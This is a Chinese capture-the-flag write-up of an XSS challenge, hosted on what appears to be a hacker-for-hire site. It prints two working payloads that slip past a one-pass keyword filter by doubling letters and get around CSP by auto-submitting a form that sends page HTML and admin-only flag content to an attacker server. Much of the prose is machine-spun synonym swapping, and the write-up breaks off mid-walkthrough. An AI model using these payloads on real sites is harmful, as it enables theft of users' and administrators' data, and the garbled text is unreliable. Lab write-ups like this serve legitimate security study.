pwnhub -- 肯定防护 writeup
周末做了一道关于我来说很蛋疼的标题...可是看了各位师傅的writeup就觉得自己的思路太窄了....
标题地址:https://pwnhub.cn/gamedetail?id=13
注册之后有个留言板,有CSP(不允许对外发送恳求),通过测验只过滤一次某些单次,如:on,oonn就能过。
用表单来绕过csp回来页面到我的服务器上,看到提示
poc:
<imong src=x oonnerror="var htmlstr = document.getElementsByTagName('html')[0].innerHTML;$('body').append('<form actioonn=http://xxx.xxx.xxx.xxx/hub1'+ escape(htmlstr)+' method=GET id=show></form><scronipt>document.getElementById('show').submit()</scronipt>')">
转码后发现提示( http://zone.secevery.com/code/index.html 在线编码转码...之前写的辣鸡程序...):
拜访http://52.80.63.91/adminshigesha233e3333/ 提示flag.php
拜访flag.php 提示只要admin能看....
测验盲打admin回来flag.php的内容.
poc:
<imong src=x oonnerror="$.get('/adminshigesha233e3333/flag.php', functioonn(data){$('body').append('<form actioonn=http://xxx.xxx.xxx.xxx/'+ escape(data)+' method=GET id=show></form><scronipt>document.getElementById('show').submit()</scronipt>')})">
提示:nothing here,╮(╯-╰)╭,what ever you try, only from adminshigesha233e3333 can read it...
http://52.80.63.91/adminshigesha233e3333/
PS:在这里卡了一天多,在各种测验加header拜访,get拜访,post拜访,各种蛋疼,测到深夜的时分标题后端挂了...
检查源码:
[1] [2] 黑客接单网
相关文章
通过Fuzzing找出浏览器的一些怪癖-黑客接单平台
在这篇文章中我将向你展现我怎么经过Fuzzing找出Firefox浏览器的多个”古怪”。一般来说,研究者Fuzzing的意图大多是找出引发内存损坏的行为,但我是个破例;我要找的是浏览器一些其他的风趣行...
师出同门,勒索不休:GandCrab退役后SODINOKIBI登场-黑客接单平台
2019年4月,Cybereason Nocturnus团队遇到了一种名为Sodinokibi(又叫Sodin、REvil)的新式勒索软件。Sobinokibi具有很强的隐蔽性,采纳了多种办法来防止检...
做 Web 开发必备的安全核对清单
假如能依照本文的这个清单来实践,就能将网络安全方面的危险降得很低。 Web开发人员安全清单 在云端开发安全又强健的 Web 运用十分难。假如你以为这很简略,那你技术水平要么现已很牛叉,要么还没有踩过...
所见非所得: 浅析同形异义词攻击及案例分析-黑客接单平台
自从 ICANN 二十多年前在域名(称为国际化域名或简称 IDN)中引进Unicode 以来,一系列全新的安全问题也随之浮出水面,一起还或许运用不同的字母和Unicode 字符注册域名。 在研讨依据同...
看我如何突破速率限制拿下任意Instagram账户-黑客接单平台
该Writeup是关于Instagram渠道的恣意账户绑架缝隙,作者通过构造出打破速率约束(Rate Limiting)的办法,可暴力猜解出恣意Instagram账户的暗码重置确认码,以此完成Inst...
qq空间破解-中国黑客
Powershell个版别对日志的支撑度一、 全体态势Zebrocy是歹意安排运用的东西之一,但实际上,运用这个东西的工作能够视为是歹意活动的一个分支。 咱们看到了Zebrocy东西的不断改善,包含增...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!